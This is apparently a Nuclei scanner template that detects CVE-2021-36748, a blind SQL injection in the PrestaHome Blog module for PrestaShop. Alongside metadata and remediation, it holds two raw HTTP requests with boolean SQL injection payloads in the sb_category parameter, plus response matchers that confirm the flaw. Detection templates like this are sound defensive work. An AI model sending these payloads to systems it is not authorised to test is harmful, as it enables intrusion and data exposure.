id: CVE-2021-36748 info: name: PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection author: whoever severity: high description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter. remediation: | Upgrade to PrestaShop version 1.7.8 or later, or apply the provided patch to fix the SQL Injection vulnerability. reference: - https://blog.sorcery.ie/posts/ph_simpleblog_sqli/ - https://alysum5.promokit.eu/promokit/documentation/blog/ - https://blog.sorcery.ie - https://nvd.nist.gov/vuln/detail/CVE-2021-36748 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-36748 cwe-id: CWE-89 epss-score: 0.0061 epss-percentile: 0.76214 cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:* metadata: max-request: 2 vendor: prestahome product: blog framework: prestashop tags: cve,cve2021,prestashop,prestahome,sqli,cms http: - raw: - | GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1 Host: {{Hostname}} - | GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 200" - "status_code_2 == 404" - 'contains(body_1, "prestashop")' - "contains(tolower(header_2), 'index.php?controller=404')" - "len(body_2) == 0" condition: and # digest: 490a0046304402207e5144b132189d0a93214cb3d1fef0f7ff48eb0cc880f1a415ddffce7e73ac4102202a8ce0df979a15d95d483d4a115b151cb103200695b3cd3288e7d209b1e5e4e1:922c64590222798bb761d5b6d8e72950